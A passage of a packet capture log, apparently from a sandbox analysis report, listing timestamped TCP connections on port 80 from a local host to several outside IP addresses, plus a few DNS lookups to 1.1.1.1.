                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.000700951 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.003871918 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.171607018 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.176934958 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.176980972 CET8049825209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:45.177140951 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:46.519505024 CET4982580192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.535641909 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.702790022 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.702953100 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.706141949 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.872929096 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878542900 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878653049 CET8049826209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:47.878777981 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:49.222039938 CET4982680192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.238184929 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.406819105 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.406992912 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410233021 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.410320044 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.580223083 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.580251932 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586595058 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586616039 CET8049827209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:50.586735010 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:51.924588919 CET4982780192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:52.940596104 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.107837915 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.108000040 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.110161066 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.277251959 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283241034 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283286095 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.283541918 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.284126043 CET4982880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:55:53.451425076 CET8049828209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.298877001 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.436660051 CET8049829208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.436841011 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.440012932 CET4982980192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:55:58.577776909 CET8049829208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:00.970118046 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.108063936 CET8049830208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.108262062 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.111413956 CET4983080192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:01.249275923 CET8049830208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.641581059 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.779141903 CET8049831208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.779318094 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782567978 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.782618046 CET4983180192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:03.920289993 CET8049831208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.314286947 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.451843023 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.452027082 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.454502106 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:06.598073959 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112541914 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112596035 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112642050 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112684011 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112705946 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112725973 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112768888 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112812996 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112854004 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112895966 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112962961 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.112973928 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.113007069 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.113020897 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.113320112 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.256761074 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.256782055 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.256983042 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257003069 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257018089 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257031918 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257035017 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257046938 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257061958 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257076025 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257090092 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257105112 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257251024 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257271051 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257280111 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257280111 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257286072 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257302046 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257378101 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257524967 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257524967 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257559061 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257579088 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257594109 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257608891 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257623911 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257790089 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.257790089 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400515079 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400635004 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400854111 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400892019 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400907040 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.400919914 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.401165962 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.401884079 CET4983280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:56:07.539469957 CET8049832208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.405169964 CET4983380192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.597692966 CET804983389.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.597915888 CET4983380192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.601114035 CET4983380192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.793585062 CET804983389.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.795176983 CET804983389.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:12.795428038 CET4983380192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:14.107147932 CET4983380192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.123305082 CET4983480192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.323550940 CET804983489.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.323762894 CET4983480192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.326878071 CET4983480192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.526864052 CET804983489.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.527430058 CET804983489.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.527446032 CET804983489.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:15.527590990 CET4983480192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:16.840970993 CET4983480192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:17.857502937 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.057869911 CET804983589.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.058057070 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.061311960 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.061377048 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.261835098 CET804983589.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.261912107 CET804983589.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.262478113 CET804983589.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.262526035 CET804983589.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:18.262665987 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:19.574755907 CET4983580192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.590828896 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.783298969 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.783492088 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.785655975 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978101969 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978429079 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978614092 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978871107 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978938103 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.978996038 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979039907 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979083061 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979120016 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979280949 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979346037 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:20.979981899 CET4983680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:56:21.172360897 CET804983689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:25.995922089 CET4983780192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.372658014 CET80498378.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.372809887 CET4983780192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.376046896 CET4983780192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.752407074 CET80498378.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.752474070 CET80498378.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.752484083 CET80498378.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:26.752605915 CET4983780192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:27.885364056 CET4983780192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:28.901549101 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.229516029 CET80498388.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.229752064 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.232840061 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:29.915668964 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.246010065 CET80498388.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.246099949 CET80498388.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.246192932 CET80498388.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.246380091 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:30.744225979 CET4983880192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:31.760272026 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.124775887 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.125022888 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.128263950 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.128324032 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490201950 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490282059 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490313053 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490618944 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490664959 CET80498398.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:32.490782976 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:33.634123087 CET4983980192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:34.650419950 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:34.986947060 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:34.987188101 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:34.989713907 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326009035 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326266050 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326313019 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.326607943 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:35.327233076 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:36.164278030 CET4984080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:56:36.502953053 CET80498408.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.336764097 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.656936884 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.657093048 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.660944939 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981147051 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981194019 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981225014 CET804984138.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:40.981354952 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:42.163522005 CET4984180192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.180058956 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.498960972 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.499139071 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.502299070 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821250916 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821299076 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821482897 CET804984238.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821641922 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:45.006707907 CET4984280192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.023292065 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.342772007 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.342953920 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346246958 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346308947 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.665939093 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666198969 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666241884 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666378021 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666630983 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666673899 CET804984338.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666769028 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:47.849757910 CET4984380192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:48.866260052 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.185872078 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.186065912 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.188229084 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507728100 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507761955 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507767916 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.508112907 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.508713007 CET4984480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.827971935 CET804984438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.521116018 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.689189911 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.689363956 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.692557096 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891254902 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891293049 CET8049845103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891535044 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:56.207379103 CET4984580192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.223460913 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.391311884 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.391480923 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.395035982 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592434883 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592483044 CET8049846103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.592624903 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:58.909833908 CET4984680192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:56:59.925992966 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.094000101 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.094227076 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097472906 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097537041 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.097579002 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.273761034 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284235001 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284281015 CET8049847103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:00.284482002 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:01.612488985 CET4984780192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.628448963 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.796622992 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.796772003 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.798958063 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993597984 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993669033 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993702888 CET8049848103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.993916035 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:02.994559050 CET4984880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:57:03.162591934 CET8049848103.224.182.242192.168.11.20

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.802572966 CET5853353192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.924959898 CET53585331.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:44.635790110 CET5858253192.168.11.201.1.1.1
